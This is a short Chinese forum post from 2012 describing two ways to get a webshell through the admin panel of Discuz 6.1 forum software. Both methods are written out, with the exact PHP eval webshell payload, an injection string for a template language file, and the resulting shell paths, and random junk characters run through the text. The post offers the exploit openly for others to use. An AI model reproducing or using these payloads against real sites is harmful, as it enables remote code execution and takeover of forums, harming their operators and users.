discuz6.1两种方法后台拿shell
( M: t( Q8 D' v6 j! s好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
& q7 u3 D+ x$ c1:( q; w) `# C9 d3 W
http://127.0.0.1/discuz/admincp. ... zard&frames=yes( B, c6 L- L2 `) T* G5 u8 {
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell5 W+ S0 j9 U3 z# [, T# J. d/ m$ ?
<?php eval($_POST[cmd]);?>6 l/ W6 M9 l& W8 G
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
+ L2 v+ F0 Y5 c/ K) l4 P, L, H$ d
) D m4 A8 |* ], G$ k3 A; N+ _# Z% ?
2:后台模板管理--默认模板套系--详情
! i2 v$ V, z# X" r8 L' n: }templates/default/actions.lang.php% j8 s% N1 Z, T( t4 W7 B
jhackj\\');eval($_POST[cmd])?>;//
; k# E% h9 c/ M; W% y" y; y* B6 x. _1 d/ Y' x! ?' w/ N. g5 A
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对